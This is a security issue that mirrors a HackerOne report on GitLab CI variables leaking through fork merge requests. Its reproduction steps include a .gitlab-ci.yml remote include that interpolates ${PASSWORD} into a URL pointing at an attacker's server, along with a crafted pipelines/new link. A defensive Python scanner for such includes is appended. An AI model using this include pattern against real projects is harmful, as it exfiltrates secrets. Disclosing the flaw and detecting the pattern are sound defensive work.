Backend: Leaking CI variables by visiting the pipeline new page via fork MRs
HackerOne report #2031741 by shells3c
on 2023-06-19, assigned to @ottilia_westerlund:
Report
SSOT
Refer to #417275 (closed)
Summary
Just by visiting a link crafted by the attacker, developers can leak CI variables to the outside.
Steps to reproduce
- Setup a web server
- Create a public project with a CI variable, let's say PASSWORD
- Using another account (attacker), fork the project, add (or edit) .gitlab-ci.yml:

    include:
      remote: 'https://<your_server>/${PASSWORD}.yaml'
- Copy the commit SHA and create a merge request with that change (to the victim project)
- The following URL is the attack vector:
https://gitlab.com/<victim_project_path>/-/pipelines/new?ref=<copied_sha>
If the victim visits this link, the CI variable will be sent to the attacker's server. You can try it out by accessing the URL from the victim account.
Output of checks
This bug happens on GitLab.com
Impact
Developers can leak CI variables of their project by visiting a link.
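As an added defender-side check (not part of the report and not GitLab's own code): a small scanner that flags remote includes whose URL interpolates CI variables, which is the pattern the report relies on, so a reviewer can spot it in a fork MR's .gitlab-ci.yml before creating a pipeline on that ref. The sample .gitlab-ci.yml and the example.invalid host are constructed for this example; the line-based matching is a heuristic, not a full YAML parse.

```python
import re
from typing import List, Tuple

# Constructed sample .gitlab-ci.yml; line 2 mirrors the report's pattern.
SAMPLE_CI_YML = """\
include:
  - remote: 'https://example.invalid/${PASSWORD}.yaml'
  - remote: "https://example.invalid/common.yaml"
  - 'https://example.invalid/$DEPLOY_TOKEN/x.yml'
  - local: '/templates/build.yml'

deploy:
  script:
    - echo "$CI_COMMIT_SHA"
"""

# A `remote:` include, an `include: <url>` shorthand, or a bare URL list item.
REMOTE_RE = re.compile(
    r"^\s*(?:-\s*)?(?:remote:|include:)?\s*['\"]?(https?://[^'\"\s#]+)"
)
# $NAME and ${NAME} references; `$$` escaping is not modelled.
VAR_RE = re.compile(r"\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?")


def remote_includes(ci_yml: str) -> List[Tuple[int, str]]:
    """Return (line_number, url) for every remote include found in the text."""
    found = []
    for n, line in enumerate(ci_yml.splitlines(), start=1):
        m = REMOTE_RE.match(line)
        if m:
            found.append((n, m.group(1)))
    return found


def variables_in(url: str) -> List[str]:
    """Names of CI variables referenced inside a URL."""
    return VAR_RE.findall(url)


def risky_remote_includes(ci_yml: str) -> List[Tuple[int, str, List[str]]]:
    """Remote includes whose URL embeds a variable: GitLab expands the variable
    when it resolves the include, so the value is sent to the remote host."""
    risky = []
    for n, url in remote_includes(ci_yml):
        names = variables_in(url)
        if names:
            risky.append((n, url, names))
    return risky


if __name__ == "__main__":
    for n, url, names in risky_remote_includes(SAMPLE_CI_YML):
        print(f"line {n}: remote include leaks {names}: {url}")
```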